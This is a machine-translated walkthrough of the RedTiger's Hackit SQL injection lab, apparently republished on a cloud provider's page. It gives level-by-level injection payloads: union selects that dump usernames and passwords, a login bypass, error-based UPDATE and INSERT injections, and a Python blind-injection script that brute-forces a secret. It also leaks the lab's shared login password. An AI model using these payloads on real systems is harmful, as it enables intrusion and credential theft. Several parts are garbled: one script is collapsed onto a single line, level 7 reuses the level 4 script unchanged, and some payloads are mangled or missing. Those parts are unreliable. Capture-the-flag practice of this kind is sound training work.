Penetration Test drill platform RedTigers Hackit customs clearance test

Source: Internet
Author: User

Penetration Test drill platform RedTigers Hackit customs clearance test

Level 1

A common injection function. You can directly construct a statement.

Https://redtiger.labs.overthewire.org/level1.php? Cat = 1 union select 1, 2, username, password from levelsponusers

Level 2

The question is, if a simple password is bypassed, simply try it. SQL universal password

Username, random password, OR '1' = '1

Bypass successful

Level 3

Try an error... Drunk too

So let's make a mistake ~

Whether it is sqli, but SQL does not return an error. For php reasons

Until

Https://redtiger.labs.overthewire.org/level3.php? Usr [0] = a & usr [1] = B

An error is displayed.

Warning: preg_match () expects parameter 2 to be string, array given in/var/www/hackit/urlcrypt. inc on line 21

Because files such as. inc can be accessed, we have obtained some source code.

<?php
       
   function encrypt($str)
   {
       $cryptedstr = "";
       for ($i =0; $i < strlen($str); $i++)
       {
           $temp = ord(substr($str,$i,1)) ^ 192;
           
           while(strlen($temp)<3)
           {
               $temp = "0".$temp;
           }
           $cryptedstr .= $temp. "";
       }
       return base64_encode($cryptedstr);
   }
 
   function decrypt ($str)
   {
       if(preg_match('%^[a-zA-Z0-9/+]*={0,2}$%',$str))
       {
           $str = base64_decode($str);
           if ($str != "" && $str != null && $str != false)
           {
               $decStr = "";
               
               for ($i=0; $i < strlen($str); $i+=3)
               {
                   $array[$i/3] = substr($str,$i,3);
               }
               foreach($array as $s)
               {
                   $a = $s^192;
                   $decStr .= chr($a);
               }
               
               return $decStr;
           }
           return false;
       }
       return false;
   }
?>

This file provides encryption and decryption methods for the usr parameter. Therefore, we use this encryption method to encrypt our statements and obtain the final POC.

 

Https://redtiger.labs.overthewire.org/level3.php? Usr = disabled

Level 4

Click me.

Query returned 1 rows.

Change the single quotation mark

Query returned 0 rows.

So it should be blind injection.

Order by indicates that there are two columns, although it is useless. First, judge the length.

Https://redtiger.labs.overthewire.org/level4.php? Id = 1 union select keyword, 1 from level4_secret where length (keyword) = 17

17 bytes in total. This time it is definitely not MD5... Write the script and run it again from A-Z a-z 0-9 to get the final result
 

# -*- coding: utf-8 -*-import requestss = requests.Session()result = ""login = {'password': 'dont_publish_solutions_GRR!',   'level4login': 'Login'}for x in range(1,17):   flag = True   url = "http://redtiger.labs.overthewire.org/level4.php?id=1 union select keyword,1  from level4_secret where SUBSTR(keyword,%d,1)='%s'"   for i in range(ord('a'),ord('z')+1):       if(flag == False):           break       test_url = url % (x,chr(i))       r = s.post(test_url, data = login)       if "2 rows" in r.content:           result = result + chr(i)           flag = False   for i in range(ord('A'),ord('Z')+1):       if(flag == False):           break       test_url = url % (x,chr(i))       r = s.post(test_url, data = login)       if "2 rows" in r.content:           result = result + chr(i)           flag = False   for i in range(ord('0'),ord('9')+1):       if(flag == False):           break       test_url = url % (x,chr(i))       r = s.post(test_url, data = login)       if "2 rows" in r.content:           result = result + chr(i)           flag = False   print resultprint result

Log on and bypass. Several functions are disabled, which is not blind injection. Let's check the error message.

Determine whether the logon is successful based on the number of rows in the final result.

Login = Login & password = 1 & username = 'Union select 0x61646d696e as username, md5 (1) as password #

Level 6

Target: Get the first user in table level6_users with status 1

First, check status 1 for common injection, which is not difficult.

POC

Https://redtiger.labs.overthewire.org/level6.php? User = 0% 20 union % 20 select % 201, average, 1%, 20 from % 20level6_users % 20 where % 20 status = 1

Level 7

It is a blind note, but this time it is in the position of the search, the restrictions are more stringent, So we change the keyword ..

So we have the same idea as a Level above.

Re-programming

# -*- coding: utf-8 -*-
import requests
s = requests.Session()
result = ""
login = {'password': 'dont_publish_solutions_GRR!',
   'level4login': 'Login'}
for x in range(1,17):
   flag = True
   url = "http://redtiger.labs.overthewire.org/level4.php?id=1 union select keyword,1  from level4_secret where SUBSTR(keyword,%d,1)='%s'"
   for i in range(ord('a'),ord('z')+1):
       if(flag == False):
           break
       test_url = url % (x,chr(i))
       r = s.post(test_url, data = login)
       if "2 rows" in r.content:
           result = result + chr(i)
           flag = False
   for i in range(ord('A'),ord('Z')+1):
       if(flag == False):
           break
       test_url = url % (x,chr(i))
       r = s.post(test_url, data = login)
       if "2 rows" in r.content:
           result = result + chr(i)
           flag = False
   for i in range(ord('0'),ord('9')+1):
       if(flag == False):
           break
       test_url = url % (x,chr(i))
       r = s.post(test_url, data = login)
       if "2 rows" in r.content:
           result = result + chr(i)
           flag = False
   print result
print result

The above Code seems a little problematic.

Level 8

An error is thrown when an 'error base' is added, which is obviously an error base. Then the poc is analyzed and constructed.

Hans @ localhost ', name = password, icq = 'q

Level 9

Still error base

Use a 'to determine whether the injection appears in textarea, and then construct the statement.

'), (Select username from level9_users limit 1), (select password from level9_users limit 1 ),'

Pass

Level 10

Only one Login button is provided. Through packet capture, we can see a base64 encrypted json

Decrypted

A: 2: {s: 8: "username"; s: 6: "Monkey"; s: 8: "password"; s: 12: "0815 password ";}


Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.